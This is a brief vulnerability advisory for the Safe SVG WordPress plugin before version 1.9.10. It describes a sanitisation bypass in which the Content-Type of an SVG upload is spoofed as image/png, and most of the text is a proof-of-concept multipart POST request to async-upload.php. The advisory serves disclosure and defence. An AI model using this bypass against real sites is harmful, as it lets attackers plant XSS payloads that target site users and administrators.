Safe SVG < 1.9.10 - SVG Sanitisation Bypass

The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).

PoC

POST /wp-admin/async-upload.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174 Content-Length: 947 Connection: close Cookie: [user with upload capability] -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“name” xss.svg -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“action” upload-attachment -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“_wpnonce” b281e72731 -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“async-upload”; filename=“xss.svg” Content-Type: image/png -----------------------------27451310545300823063986174174–